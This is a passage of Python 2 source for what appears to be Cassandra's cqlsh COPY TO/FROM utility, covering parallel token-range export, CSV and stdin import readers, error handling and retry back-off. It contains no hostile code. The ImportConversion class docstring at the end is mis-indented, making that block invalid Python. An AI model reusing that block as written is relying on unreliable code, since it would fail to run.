            shell.printerr('Found no ranges to query, check begin and end tokens: %s - %s' % (begin_token, end_token))

        return ranges

    def get_min_token(self):
        """
        :return the minimum token, which depends on the partitioner.
        For partitioners that do not support tokens we return None, in
        this cases we will not work in parallel, we'll just send all requests
        to the cqlsh session host.
        """
        partitioner = self.shell.conn.metadata.partitioner

        if partitioner.endswith('RandomPartitioner'):
            return -1
        elif partitioner.endswith('Murmur3Partitioner'):
            return -(2 ** 63)   # Long.MIN_VALUE in Java
        else:
            return None

    def send_work(self, ranges, tokens_to_send):
        """Round-robin the given token ranges across the worker processes,
        resuming from the worker after the one that last handled the first range."""
        prev_worker_no = ranges[tokens_to_send[0]]['workerno']
        i = prev_worker_no + 1 if -1 <= prev_worker_no < (self.num_processes - 1) else 0

        for token_range in tokens_to_send:
            ranges[token_range]['workerno'] = i
            self.outmsg.channels[i].send((token_range, ranges[token_range]))
            ranges[token_range]['attempts'] += 1

            i = i + 1 if i < self.num_processes - 1 else 0

    def export_records(self, ranges):
        """
        Send records to child processes and monitor them by collecting their results
        or any errors. We terminate when we have processed all the ranges or when one child
        process has died (since in this case we will never get any ACK for the ranges
        processed by it and at the moment we don't keep track of which ranges a
        process is handling).
        """
        shell = self.shell
        processes = self.processes
        meter = RateMeter(log_fcn=self.printmsg,
                          update_interval=self.options.copy['reportfrequency'],
                          log_file=self.options.copy['ratefile'])
        total_requests = len(ranges)
        max_attempts = self.options.copy['maxattempts']

        self.send_work(ranges, ranges.keys())

        num_processes = len(processes)
        succeeded = 0
        failed = 0
        while (failed + succeeded) < total_requests and self.num_live_processes() == num_processes:
            for token_range, result in self.inmsg.recv(timeout=0.1):
                if token_range is None and result is None:  # a request has finished
                    succeeded += 1
                elif isinstance(result, Exception):  # an error occurred
                    # This token_range failed, retry up to max_attempts if no rows received yet,
                    # If rows were already received we'd risk duplicating data.
                    # Note that there is still a slight risk of duplicating data, even if we have
                    # an error with no rows received yet, it's just less likely. To avoid retrying on
                    # all timeouts would however mean we could risk not exporting some rows.
                    if ranges[token_range]['attempts'] < max_attempts and ranges[token_range]['rows'] == 0:
                        shell.printerr('Error for %s: %s (will try again later attempt %d of %d)'
                                       % (token_range, result, ranges[token_range]['attempts'], max_attempts))
                        self.send_work(ranges, [token_range])
                    else:
                        shell.printerr('Error for %s: %s (permanently given up after %d rows and %d attempts)'
                                       % (token_range, result, ranges[token_range]['rows'],
                                          ranges[token_range]['attempts']))
                        failed += 1
                else:  # partial result received
                    data, num = result
                    self.writer.write(data, num)
                    meter.increment(n=num)
                    ranges[token_range]['rows'] += num

        if self.num_live_processes() < len(processes):
            for process in processes:
                if not process.is_alive():
                    shell.printerr('Child process %d died with exit code %d' % (process.pid, process.exitcode))

        if succeeded < total_requests:
            shell.printerr('Exported %d ranges out of %d total ranges, some records might be missing'
                           % (succeeded, total_requests))

        self.printmsg("\n%d rows exported to %d files in %s." %
                      (meter.get_total_records(),
                       self.writer.num_files,
                       self.describe_interval(time.time() - self.time_start)))
class FilesReader(object):
    """
    A wrapper around a csv reader to keep track of when we have
    exhausted reading input files. We are passed a comma separated
    list of paths, where each path is a valid glob expression.
    We generate a source generator and we read each source one
    by one.
    """
    def __init__(self, fname, options):
        self.chunk_size = options.copy['chunksize']
        self.header = options.copy['header']
        self.max_rows = options.copy['maxrows']
        self.skip_rows = options.copy['skiprows']
        self.fname = fname
        self.sources = None  # must be created later due to pickle problems on Windows
        self.num_sources = 0
        self.current_source = None
        self.num_read = 0

    def get_source(self, paths):
        """
        Return a source generator. Each source is a named tuple
        wrapping the source input, file name and a boolean indicating
        if it requires closing.
        """
        def make_source(fname):
            try:
                return open(fname, 'rb')
            except IOError, e:
                raise IOError("Can't open %r for reading: %s" % (fname, e))

        for path in paths.split(','):
            path = path.strip()
            if os.path.isfile(path):
                yield make_source(path)
            else:
                result = glob.glob(path)
                if len(result) == 0:
                    raise IOError("Can't open %r for reading: no matching file found" % (path,))

                for f in result:
                    yield (make_source(f))

    def start(self):
        """Create the source generator and open the first source."""
        self.sources = self.get_source(self.fname)
        self.next_source()

    @property
    def exhausted(self):
        # True once there is no source left to read from
        return not self.current_source

    def next_source(self):
        """
        Close the current source, if any, and open the next one. Return true
        if there is another source, false otherwise.
        """
        self.close_current_source()
        while self.current_source is None:
            try:
                self.current_source = self.sources.next()
                if self.current_source:
                    self.num_sources += 1
            except StopIteration:
                return False

        if self.header:
            # consume the header line of the new source
            self.current_source.next()

        return True

    def close_current_source(self):
        if not self.current_source:
            return

        self.current_source.close()
        self.current_source = None

    def close(self):
        self.close_current_source()

    def read_rows(self, max_rows):
        """Read up to min(max_rows, chunk_size) rows from the current source,
        honouring the global maxrows and skiprows options."""
        if not self.current_source:
            return []

        rows = []
        for i in xrange(min(max_rows, self.chunk_size)):
            try:
                row = self.current_source.next()
                self.num_read += 1

                # NOTE(review): when maxrows is exceeded this advances to the
                # next source rather than closing the current one outright —
                # presumably to keep `exhausted` consistent; confirm intent.
                if 0 <= self.max_rows < self.num_read:
                    self.next_source()
                    break

                if self.num_read > self.skip_rows:
                    rows.append(row)
            except StopIteration:
                self.next_source()
                break

        return filter(None, rows)
class PipeReader(object):
    """
    A class for reading rows received on a pipe, this is used for reading input from STDIN
    """
    def __init__(self, inpipe, options):
        self.inpipe = inpipe
        self.chunk_size = options.copy['chunksize']
        self.header = options.copy['header']
        self.max_rows = options.copy['maxrows']
        self.skip_rows = options.copy['skiprows']
        self.num_read = 0
        self.exhausted = False
        self.num_sources = 1

    def start(self):
        # nothing to open: the pipe is already connected
        pass

    def read_rows(self, max_rows):
        """Receive up to min(max_rows, chunk_size) rows from the pipe, honouring
        the header, maxrows and skiprows options. A None row marks end of input."""
        rows = []
        for i in xrange(min(max_rows, self.chunk_size)):
            row = self.inpipe.recv()
            if row is None:  # sentinel: the sender has no more data
                self.exhausted = True
                break

            self.num_read += 1
            if 0 <= self.max_rows < self.num_read:
                self.exhausted = True
                break  # max rows exceeded

            # NOTE(review): FilesReader keeps rows only when num_read > skip_rows
            # (skipping skip_rows rows), while this test skips rows with
            # num_read < skip_rows — one row fewer. Possible off-by-one; confirm
            # against FilesReader.read_rows before relying on skiprows via STDIN.
            if self.header or self.num_read < self.skip_rows:
                self.header = False  # skip header or initial skip_rows rows
                continue

            rows.append(row)

        return rows
class ImportProcessResult(object):
    """
    An object sent from ImportProcess instances to the parent import task in order to indicate progress.
    """
    def __init__(self, imported=0):
        # number of rows imported since the previous report
        self.imported = imported
class FeedingProcessResult(object):
    """
    An object sent from FeedingProcess instances to the parent import task in order to indicate progress.
    """
    def __init__(self, sent, reader):
        # snapshot of the feeder's progress: rows sent plus the reader's counters
        self.sent = sent
        self.num_sources = reader.num_sources
        self.skip_rows = reader.skip_rows
class ImportTaskError(object):
    """
    An object sent from child processes (feeder or workers) to the parent import task to indicate an error.
    """
    def __init__(self, name, msg, rows=None, attempts=1, final=True):
        self.name = name
        self.msg = msg
        self.rows = rows if rows else []
        self.attempts = attempts
        self.final = final

    def is_parse_error(self):
        """
        We treat read and parse errors as unrecoverable and we have different global counters for giving up when
        a maximum has been reached. We consider value and type errors as parse errors as well since they
        are typically non recoverable.
        """
        # str.startswith accepts a tuple of prefixes, equivalent to the or-chain
        parse_error_prefixes = ('ValueError', 'TypeError', 'ParseError', 'IndexError', 'ReadError')
        return self.name.startswith(parse_error_prefixes)
class ImportErrorHandler(object):
    """
    A class for managing import errors: keeps per-category error counters used
    to decide when to give up, and appends failed rows to the error file so
    they can be re-imported after the problem is fixed.
    """
    def __init__(self, task):
        self.shell = task.shell
        self.options = task.options
        self.max_attempts = self.options.copy['maxattempts']
        self.max_parse_errors = self.options.copy['maxparseerrors']
        self.max_insert_errors = self.options.copy['maxinserterrors']
        self.err_file = self.options.copy['errfile']
        self.parse_errors = 0
        self.insert_errors = 0
        self.num_rows_failed = 0
        # Preserve any previous error file by renaming it with a timestamp
        # suffix rather than appending to it.
        if os.path.isfile(self.err_file):
            now = datetime.datetime.now()
            old_err_file = self.err_file + now.strftime('.%Y%m%d_%H%M%S')
            printdebugmsg("Renaming existing %s to %s\n" % (self.err_file, old_err_file))
            os.rename(self.err_file, old_err_file)
    def max_exceeded(self):
        # A negative maximum disables the limit for that error category.
        if self.insert_errors > self.max_insert_errors >= 0:
            self.shell.printerr("Exceeded maximum number of insert errors %d" % self.max_insert_errors)
            return True
        if self.parse_errors > self.max_parse_errors >= 0:
            self.shell.printerr("Exceeded maximum number of parse errors %d" % self.max_parse_errors)
            return True
        return False
    def add_failed_rows(self, rows):
        # Append failed rows to the error file using the configured csv
        # dialect so the file can be fed straight back into COPY FROM.
        self.num_rows_failed += len(rows)
        with open(self.err_file, "a") as f:
            writer = csv.writer(f, **self.options.dialect)
            for row in rows:
                writer.writerow(row)
    def handle_error(self, err):
        """
        Handle an error by printing the appropriate error message and incrementing the correct counter.
        """
        shell = self.shell
        if err.is_parse_error():
            # Parse errors are never retried: record the rows immediately.
            self.parse_errors += len(err.rows)
            self.add_failed_rows(err.rows)
            shell.printerr("Failed to import %d rows: %s - %s,  given up without retries"
                           % (len(err.rows), err.name, err.msg))
        else:
            self.insert_errors += len(err.rows)
            if not err.final:
                shell.printerr("Failed to import %d rows: %s - %s,  will retry later, attempt %d of %d"
                               % (len(err.rows), err.name, err.msg, err.attempts, self.max_attempts))
            else:
                self.add_failed_rows(err.rows)
                shell.printerr("Failed to import %d rows: %s - %s,  given up after %d attempts"
                               % (len(err.rows), err.name, err.msg, err.attempts))
class ImportTask(CopyTask):
    """
    A class to import data from .csv by instantiating one or more processes
    that work in parallel (ImportProcess).
    """
    def __init__(self, shell, ks, table, columns, fname, opts, protocol_version, config_file):
        CopyTask.__init__(self, shell, ks, table, columns, fname, opts, protocol_version, config_file, 'from')
        options = self.options
        # Columns the user asked to skip, and the remaining columns to import.
        self.skip_columns = [c.strip() for c in self.options.copy['skipcols'].split(',')]
        self.valid_columns = [c for c in self.columns if c not in self.skip_columns]
        self.receive_meter = RateMeter(log_fcn=self.printmsg,
                                       update_interval=options.copy['reportfrequency'],
                                       log_file=options.copy['ratefile'])
        self.error_handler = ImportErrorHandler(self)
        # Set once the feeder process reports how many rows it sent in total.
        self.feeding_result = None
        self.sent = 0
    def make_params(self):
        # Parameters passed down to the child worker processes.
        ret = CopyTask.make_params(self)
        ret['skip_columns'] = self.skip_columns
        ret['valid_columns'] = self.valid_columns
        return ret
    def validate_columns(self):
        if not CopyTask.validate_columns(self):
            return False
        shell = self.shell
        if not self.valid_columns:
            shell.printerr("No valid column specified")
            return False
        # Every primary key column must be imported, otherwise rows cannot
        # be inserted at all.
        for c in self.table_meta.primary_key:
            if c.name not in self.valid_columns:
                shell.printerr("Primary key column '%s' missing or skipped" % (c.name,))
                return False
        return True
    def run(self):
        shell = self.shell
        if self.options.unrecognized:
            shell.printerr('Unrecognized COPY FROM options: %s' % ', '.join(self.options.unrecognized.keys()))
            return
        if not self.validate_columns():
            return 0
        columns = u"[" + u", ".join(self.valid_columns) + u"]"
        self.printmsg(u"\nStarting copy of %s.%s with columns %s." % (self.ks, self.table, columns), encoding=self.encoding)
        try:
            params = self.make_params()
            # One ImportProcess per slot except the last, which is reserved
            # for the feeder process created just below.
            for i in range(self.num_processes - 1):
                self.processes.append(ImportProcess(self.update_params(params, i)))
            feeder = FeedingProcess(self.outmsg.pipes[-1], self.inmsg.pipes[-1],
                                    self.outmsg.pipes[:-1], self.fname, self.options,
                                    self.shell.conn if not IS_WINDOWS else None)
            self.processes.append(feeder)
            self.start_processes()
            pr = profile_on() if PROFILE_ON else None
            self.import_records()
            if pr:
                profile_off(pr, file_name='parent_profile_%d.txt' % (os.getpid(),))
        except Exception, exc:
            shell.printerr(unicode(exc))
            if shell.debug:
                traceback.print_exc()
            return 0
        finally:
            self.close()
    def send_stdin_rows(self):
        """
        We need to pass stdin rows to the feeder process as it is not safe to pickle or share stdin
        directly (in case of file the child process would close it). This is a very primitive support
        for STDIN import in that we won't start reporting progress until STDIN is fully consumed. I
        think this is reasonable.
        """
        shell = self.shell
        self.printmsg("[Use . on a line by itself to end input]")
        # The last channel is the feeder's; a trailing None tells the
        # PipeReader on the other end that input is exhausted.
        for row in shell.use_stdin_reader(prompt='[copy] ', until=r'.'):
            self.outmsg.channels[-1].send(row)
        self.outmsg.channels[-1].send(None)
        if shell.tty:
            print
    def import_records(self):
        """
        Keep on running until we have stuff to receive or send and until all processes are running.
        Send data (batches or retries) up to the max ingest rate. If we are waiting for stuff to
        receive check the incoming queue.
        """
        if not self.fname:
            self.send_stdin_rows()
        child_timeout = self.options.copy['childtimeout']
        last_recv_num_records = 0
        last_recv_time = time.time()
        # Loop until every row the feeder sent has been acknowledged by the
        # workers, a limit was hit, a child died, or progress stalled.
        while self.feeding_result is None or self.receive_meter.total_records < self.feeding_result.sent:
            self.receive_results()
            if self.feeding_result is not None:
                if self.receive_meter.total_records != last_recv_num_records:
                    last_recv_num_records = self.receive_meter.total_records
                    last_recv_time = time.time()
                elif (time.time() - last_recv_time) > child_timeout:
                    self.shell.printerr("No records inserted in {} seconds, aborting".format(child_timeout))
                    break
            if self.error_handler.max_exceeded() or not self.all_processes_running():
                break
        if self.error_handler.num_rows_failed:
            self.shell.printerr("Failed to process %d rows; failed rows written to %s" %
                                (self.error_handler.num_rows_failed,
                                 self.error_handler.err_file))
        if not self.all_processes_running():
            self.shell.printerr("{} child process(es) died unexpectedly, aborting"
                                .format(self.num_processes - self.num_live_processes()))
        else:
            if self.error_handler.max_exceeded():
                self.processes[-1].terminate()  # kill the feeder
            # Send the poison pill (None) to every still-alive child so they
            # exit cleanly.
            for i, _ in enumerate(self.processes):
                if self.processes[i].is_alive():
                    self.outmsg.channels[i].send(None)
        # allow time for worker processes to exit cleanly
        attempts = 50  # 100 milliseconds per attempt, so 5 seconds total
        while attempts > 0 and self.num_live_processes() > 0:
            time.sleep(0.1)
            attempts -= 1
        self.printmsg("\n%d rows imported from %d files in %s (%d skipped)." %
                      (self.receive_meter.get_total_records(),
                       self.feeding_result.num_sources if self.feeding_result else 0,
                       self.describe_interval(time.time() - self.time_start),
                       self.feeding_result.skip_rows if self.feeding_result else 0))
    def all_processes_running(self):
        return self.num_live_processes() == len(self.processes)
    def receive_results(self):
        """
        Receive results from the worker processes, which will send the number of rows imported
        or from the feeder process, which will send the number of rows sent when it has finished sending rows.
        """
        aggregate_result = ImportProcessResult()
        try:
            for result in self.inmsg.recv(timeout=0.1):
                if isinstance(result, ImportProcessResult):
                    aggregate_result.imported += result.imported
                elif isinstance(result, ImportTaskError):
                    self.error_handler.handle_error(result)
                elif isinstance(result, FeedingProcessResult):
                    self.feeding_result = result
                else:
                    raise ValueError("Unexpected result: %s" % (result,))
        finally:
            # Count whatever was aggregated even if recv raised part-way.
            self.receive_meter.increment(aggregate_result.imported)
class FeedingProcess(mp.Process):
    """
    A process that reads from import sources and sends chunks to worker processes.
    """
    def __init__(self, inpipe, outpipe, worker_pipes, fname, options, parent_cluster):
        mp.Process.__init__(self, target=self.run)
        self.inpipe = inpipe
        self.outpipe = outpipe
        self.worker_pipes = worker_pipes
        self.inmsg = None  # must be created after forking on Windows
        self.outmsg = None  # must be created after forking on Windows
        self.worker_channels = None  # must be created after forking on Windows
        # Read from files when a file name was given, otherwise from the pipe
        # that the parent uses to forward STDIN rows.
        self.reader = FilesReader(fname, options) if fname else PipeReader(inpipe, options)
        self.send_meter = RateMeter(log_fcn=None, update_interval=1)
        self.ingest_rate = options.copy['ingestrate']
        self.num_worker_processes = options.copy['numprocesses']
        self.max_pending_chunks = options.copy['maxpendingchunks']
        self.chunk_id = 0
        self.parent_cluster = parent_cluster
    def on_fork(self):
        """
        Create the channels and release any parent connections after forking,
        see CASSANDRA-11749 for details.
        """
        self.inmsg = ReceivingChannel(self.inpipe)
        self.outmsg = SendingChannel(self.outpipe)
        self.worker_channels = [SendingChannel(p) for p in self.worker_pipes]
        if self.parent_cluster:
            printdebugmsg("Closing parent cluster sockets")
            self.parent_cluster.shutdown()
    def run(self):
        pr = profile_on() if PROFILE_ON else None
        self.inner_run()
        if pr:
            profile_off(pr, file_name='feeder_profile_%d.txt' % (os.getpid(),))
    def inner_run(self):
        """
        Send one batch per worker process to the queue unless we have exceeded the ingest rate.
        In the export case we queue everything and let the worker processes throttle using max_requests,
        here we throttle using the ingest rate in the feeding process because of memory usage concerns.
        When finished we send back to the parent process the total number of rows sent.
        """
        self.on_fork()
        reader = self.reader
        try:
            reader.start()
        except IOError, exc:
            # NOTE(review): after a failed start the loop below still runs
            # with an unstarted reader; presumably read_rows then raises and
            # is reported via the except below -- confirm against the readers.
            self.outmsg.send(ImportTaskError(exc.__class__.__name__, exc.message))
        channels = self.worker_channels
        max_pending_chunks = self.max_pending_chunks
        sent = 0
        failed_attempts = 0
        while not reader.exhausted:
            # Only feed workers whose backlog is below the pending limit;
            # back off exponentially when all workers are busy.
            channels_eligible = filter(lambda c: c.num_pending() < max_pending_chunks, channels)
            if not channels_eligible:
                failed_attempts += 1
                delay = randint(1, pow(2, failed_attempts))
                printdebugmsg("All workers busy, sleeping for %d second(s)" % (delay,))
                time.sleep(delay)
                continue
            elif failed_attempts > 0:
                failed_attempts = 0
            for ch in channels_eligible:
                try:
                    # Throttle to the configured ingest rate.
                    max_rows = self.ingest_rate - self.send_meter.current_record
                    if max_rows <= 0:
                        self.send_meter.maybe_update(sleep=False)
                        continue
                    rows = reader.read_rows(max_rows)
                    if rows:
                        sent += self.send_chunk(ch, rows)
                except Exception, exc:
                    self.outmsg.send(ImportTaskError(exc.__class__.__name__, exc.message))
                if reader.exhausted:
                    break
        # send back to the parent process the number of rows sent to the worker processes
        self.outmsg.send(FeedingProcessResult(sent, reader))
        # wait for poison pill (None)
        self.inmsg.recv()
    def send_chunk(self, ch, rows):
        # Chunks are dicts so the workers can update the 'imported' count.
        self.chunk_id += 1
        num_rows = len(rows)
        self.send_meter.increment(num_rows)
        ch.send({'id': self.chunk_id, 'rows': rows, 'imported': 0, 'num_rows_sent': num_rows})
        return num_rows
    def close(self):
        self.reader.close()
        self.inmsg.close()
        self.outmsg.close()
        for ch in self.worker_channels:
            ch.close()
class ChildProcess(mp.Process):
    """
    A child worker process; holds the functionality common to ImportProcess and ExportProcess.
    """
    def __init__(self, params, target):
        mp.Process.__init__(self, target=target)
        # Pipe endpoints to/from the parent; wrapped into channels in on_fork().
        self.inpipe = params['inpipe']
        self.outpipe = params['outpipe']
        self.inmsg = None  # must be initialized after fork on Windows
        self.outmsg = None  # must be initialized after fork on Windows
        self.ks = params['ks']
        self.table = params['table']
        self.local_dc = params['local_dc']
        self.columns = params['columns']
        self.debug = params['debug']
        self.port = params['port']
        self.hostname = params['hostname']
        self.connect_timeout = params['connect_timeout']
        self.cql_version = params['cql_version']
        self.auth_provider = params['auth_provider']
        self.parent_cluster = params['parent_cluster']
        self.ssl = params['ssl']
        self.protocol_version = params['protocol_version']
        self.config_file = params['config_file']
        options = params['options']
        self.date_time_format = options.copy['dtformats']
        self.consistency_level = options.copy['consistencylevel']
        self.decimal_sep = options.copy['decimalsep']
        self.thousands_sep = options.copy['thousandssep']
        self.boolean_styles = options.copy['boolstyle']
        self.max_attempts = options.copy['maxattempts']
        self.encoding = options.copy['encoding']
        # Here we inject some failures for testing purposes, only if this environment variable is set
        if os.environ.get('CQLSH_COPY_TEST_FAILURES', ''):
            self.test_failures = json.loads(os.environ.get('CQLSH_COPY_TEST_FAILURES', ''))
        else:
            self.test_failures = None
    def on_fork(self):
        """
        Create the channels and release any parent connections after forking, see CASSANDRA-11749 for details.
        """
        self.inmsg = ReceivingChannel(self.inpipe)
        self.outmsg = SendingChannel(self.outpipe)
        if self.parent_cluster:
            printdebugmsg("Closing parent cluster sockets")
            self.parent_cluster.shutdown()
    def close(self):
        printdebugmsg("Closing queues...")
        self.inmsg.close()
        self.outmsg.close()
class ExpBackoffRetryPolicy(RetryPolicy):
    """
    A retry policy that retries read and write timeouts after sleeping with
    exponential back-off, up to parent_process.max_attempts attempts per query.
    """
    def __init__(self, parent_process):
        RetryPolicy.__init__(self)
        self.max_attempts = parent_process.max_attempts
    def on_read_timeout(self, query, consistency, required_responses,
                        received_responses, data_retrieved, retry_num):
        return self._handle_timeout(consistency, retry_num)
    def on_write_timeout(self, query, consistency, write_type,
                         required_responses, received_responses, retry_num):
        return self._handle_timeout(consistency, retry_num)
    def _handle_timeout(self, consistency, retry_num):
        delay = self.backoff(retry_num)
        if delay < 0:
            # Out of attempts: let the error propagate to the caller.
            printdebugmsg("Timeout received, giving up after %d attempts" % (retry_num + 1))
            return self.RETHROW, None
        if delay == 0:
            printdebugmsg("Timeout received, retrying immediately")
        else:
            printdebugmsg("Timeout received, retrying after %d seconds" % (delay,))
            time.sleep(delay)
        return self.RETRY, consistency
    def backoff(self, retry_num):
        """
        Perform exponential back-off up to a maximum number of times, where
        this maximum is per query.
        To back-off we should wait a random number of seconds
        between 0 and 2^c - 1, where c is the number of total failures.
        :return : the number of seconds to wait for, -1 if we should not retry
        """
        if retry_num >= self.max_attempts:
            return -1
        return randint(0, pow(2, retry_num + 1) - 1)
class ExportSession(object):
    """
    Wraps a cluster connection for the export task and tracks the number of
    in-flight requests using it.  Provides helpers for executing a query
    asynchronously at the configured consistency level and for shutting the
    cluster connection down.
    """
    def __init__(self, cluster, export_process):
        fetch_size = export_process.options.copy['pagesize']
        timeout = export_process.options.copy['pagetimeout']
        session = cluster.connect(export_process.ks)
        session.row_factory = tuple_factory
        session.default_fetch_size = fetch_size
        session.default_timeout = timeout
        printdebugmsg("Created connection to %s with page size %d and timeout %d seconds per page"
                      % (cluster.contact_points, fetch_size, timeout))
        self.cluster = cluster
        self.session = session
        # Request counter, guarded by a lock since callbacks run on driver threads.
        self.requests = 1
        self.lock = threading.Lock()
        self.consistency_level = export_process.consistency_level
    def add_request(self):
        with self.lock:
            self.requests += 1
    def complete_request(self):
        with self.lock:
            self.requests -= 1
    def num_requests(self):
        with self.lock:
            return self.requests
    def execute_async(self, query):
        statement = SimpleStatement(query, consistency_level=self.consistency_level)
        return self.session.execute_async(statement)
    def shutdown(self):
        self.cluster.shutdown()
class ExportProcess(ChildProcess):
    """
    A child worker process for the export task, ExportTask.
    """
    def __init__(self, params):
        ChildProcess.__init__(self, params=params, target=self.run)
        options = params['options']
        self.float_precision = options.copy['floatprecision']
        self.double_precision = options.copy['doubleprecision']
        self.nullval = options.copy['nullval']
        self.max_requests = options.copy['maxrequests']
        self.hosts_to_sessions = dict()  # host -> ExportSession, created lazily
        self.formatters = dict()  # formatter cache, keyed by cql type
        self.options = options
    def run(self):
        try:
            self.inner_run()
        finally:
            self.close()
    def inner_run(self):
        """
        The parent sends us (range, info) on the inbound queue (inmsg)
        in order to request us to process a range, for which we can
        select any of the hosts in info, which also contains other information for this
        range such as the number of attempts already performed. We can signal errors
        on the outbound queue (outmsg) by sending (range, error) or
        we can signal a global error by sending (None, error).
        We terminate when the inbound queue is closed.
        """
        self.on_fork()
        while True:
            # Throttle: do not start new ranges while too many are in flight.
            if self.num_requests() > self.max_requests:
                time.sleep(0.001)  # 1 millisecond
                continue
            token_range, info = self.inmsg.recv()
            self.start_request(token_range, info)
    @staticmethod
    def get_error_message(err, print_traceback=False):
        # Normalize strings, exceptions and anything else into a message.
        if isinstance(err, str):
            msg = err
        elif isinstance(err, BaseException):
            msg = "%s - %s" % (err.__class__.__name__, err)
            if print_traceback and sys.exc_info()[1] == err:
                traceback.print_exc()
        else:
            msg = unicode(err)
        return msg
    def report_error(self, err, token_range):
        msg = self.get_error_message(err, print_traceback=self.debug)
        printdebugmsg(msg)
        self.send((token_range, Exception(msg)))
    def send(self, response):
        self.outmsg.send(response)
    def start_request(self, token_range, info):
        """
        Begin querying a range by executing an async query that
        will later on invoke the callbacks attached in attach_callbacks.
        """
        session = self.get_session(info['hosts'], token_range)
        if session:
            metadata = session.cluster.metadata.keyspaces[self.ks].tables[self.table]
            query = self.prepare_query(metadata.partition_key, token_range, info['attempts'])
            future = session.execute_async(query)
            self.attach_callbacks(token_range, future, session)
    def num_requests(self):
        # Total in-flight requests across all sessions.
        return sum(session.num_requests() for session in self.hosts_to_sessions.values())
    def get_session(self, hosts, token_range):
        """
        We return a session connected to one of the hosts passed in, which are valid replicas for
        the token range. We sort replicas by favouring those without any active requests yet or with the
        smallest number of requests. If we fail to connect we report an error so that the token will
        be retried again later.
        :return: An ExportSession connected to the chosen host.
        """
        # sorted replicas favouring those with no connections yet
        hosts = sorted(hosts,
                       key=lambda hh: 0 if hh not in self.hosts_to_sessions else self.hosts_to_sessions[hh].requests)
        errors = []
        ret = None
        for host in hosts:
            try:
                ret = self.connect(host)
            except Exception as e:
                errors.append(self.get_error_message(e))
            if ret:
                if errors:
                    printdebugmsg("Warning: failed to connect to some replicas: %s" % (errors,))
                return ret
        self.report_error("Failed to connect to all replicas %s for %s, errors: %s" % (hosts, token_range, errors),
                          token_range)
        return None
    def connect(self, host):
        # Reuse an existing session to this host if we already have one
        # (dict membership test, not .keys(): O(1) and shorter).
        if host in self.hosts_to_sessions:
            session = self.hosts_to_sessions[host]
            session.add_request()
            return session
        new_cluster = Cluster(
            contact_points=(host,),
            port=self.port,
            cql_version=self.cql_version,
            protocol_version=self.protocol_version,
            auth_provider=self.auth_provider,
            ssl_options=ssl_settings(host, self.config_file) if self.ssl else None,
            load_balancing_policy=WhiteListRoundRobinPolicy([host]),
            default_retry_policy=ExpBackoffRetryPolicy(self),
            compression=None,
            control_connection_timeout=self.connect_timeout,
            connect_timeout=self.connect_timeout,
            idle_heartbeat_interval=0)
        session = ExportSession(new_cluster, self)
        self.hosts_to_sessions[host] = session
        return session
    def attach_callbacks(self, token_range, future, session):
        """
        Attach paging-aware success/error callbacks to the response future;
        (None, None) on the outbound queue signals range completion.
        """
        metadata = session.cluster.metadata
        ks_meta = metadata.keyspaces[self.ks]
        table_meta = ks_meta.tables[self.table]
        cql_types = [CqlType(table_meta.columns[c].cql_type, ks_meta) for c in self.columns]
        def result_callback(rows):
            if future.has_more_pages:
                future.start_fetching_next_page()
                self.write_rows_to_csv(token_range, rows, cql_types)
            else:
                self.write_rows_to_csv(token_range, rows, cql_types)
                self.send((None, None))
                session.complete_request()
        def err_callback(err):
            self.report_error(err, token_range)
            session.complete_request()
        future.add_callbacks(callback=result_callback, errback=err_callback)
    def write_rows_to_csv(self, token_range, rows, cql_types):
        """Format the rows as csv and send (csv_text, row_count) to the parent."""
        if not rows:
            return  # no rows in this range
        try:
            output = StringIO()
            writer = csv.writer(output, **self.options.dialect)
            for row in rows:
                writer.writerow(map(self.format_value, row, cql_types))
            data = (output.getvalue(), len(rows))
            self.send((token_range, data))
            output.close()
        except Exception as e:
            self.report_error(e, token_range)
    def format_value(self, val, cqltype):
        """Format a single value for csv output, caching formatters per type."""
        if val is None or val == EMPTY:
            return format_value_default(self.nullval, colormap=NO_COLOR_MAP)
        formatter = self.formatters.get(cqltype, None)
        if not formatter:
            formatter = get_formatter(val, cqltype)
            self.formatters[cqltype] = formatter
        if not hasattr(cqltype, 'precision'):
            cqltype.precision = self.double_precision if cqltype.type_name == 'double' else self.float_precision
        return formatter(val, cqltype=cqltype,
                         encoding=self.encoding, colormap=NO_COLOR_MAP, date_time_format=self.date_time_format,
                         float_precision=cqltype.precision, nullval=self.nullval, quote=False,
                         decimal_sep=self.decimal_sep, thousands_sep=self.thousands_sep,
                         boolean_styles=self.boolean_styles)
    def close(self):
        ChildProcess.close(self)
        for session in self.hosts_to_sessions.values():
            session.shutdown()
    def prepare_query(self, partition_key, token_range, attempts):
        """
        Return the export query or a fake query with some failure injected.
        """
        if self.test_failures:
            return self.maybe_inject_failures(partition_key, token_range, attempts)
        else:
            return self.prepare_export_query(partition_key, token_range)
    def maybe_inject_failures(self, partition_key, token_range, attempts):
        """
        Examine self.test_failures and see if token_range is either a token range
        supposed to cause a failure (failing_range) or to terminate the worker process
        (exit_range). If not then call prepare_export_query(), which implements the
        normal behavior.
        """
        start_token, end_token = token_range
        if not start_token or not end_token:
            # exclude first and last ranges to make things simpler
            return self.prepare_export_query(partition_key, token_range)
        if 'failing_range' in self.test_failures:
            failing_range = self.test_failures['failing_range']
            if start_token >= failing_range['start'] and end_token <= failing_range['end']:
                if attempts < failing_range['num_failures']:
                    return 'SELECT * from bad_table'
        if 'exit_range' in self.test_failures:
            exit_range = self.test_failures['exit_range']
            if start_token >= exit_range['start'] and end_token <= exit_range['end']:
                sys.exit(1)
        return self.prepare_export_query(partition_key, token_range)
    def prepare_export_query(self, partition_key, token_range):
        """
        Return a query where we select all the data for this token range
        """
        pk_cols = ", ".join(protect_names(col.name for col in partition_key))
        columnlist = ', '.join(protect_names(self.columns))
        start_token, end_token = token_range
        query = 'SELECT %s FROM %s.%s' % (columnlist, protect_name(self.ks), protect_name(self.table))
        # A None boundary means the range is open on that side.
        if start_token is not None or end_token is not None:
            query += ' WHERE'
        if start_token is not None:
            query += ' token(%s) > %s' % (pk_cols, start_token)
        if start_token is not None and end_token is not None:
            query += ' AND'
        if end_token is not None:
            query += ' token(%s) <= %s' % (pk_cols, end_token)
        return query
class ParseError(Exception):
    """Raised when an import record cannot be parsed."""
class ImportConversion(object):
"""
A class for converting strings to values when importing from csv, used by ImportProcess,
the parent.
"""
    def __init__(self, parent, table_meta, statement=None):
        """
        :param parent: the ImportProcess that owns this converter; supplies the
            valid columns and all parsing/formatting options.
        :param table_meta: driver metadata for the target table.
        :param statement: the prepared statement when prepared statements are
            in use, otherwise None (a primary-key statement is prepared
            instead, used only to discover the partition key column types).
        """
        self.ks = parent.ks
        self.table = parent.table
        self.columns = parent.valid_columns
        self.nullval = parent.nullval
        self.decimal_sep = parent.decimal_sep
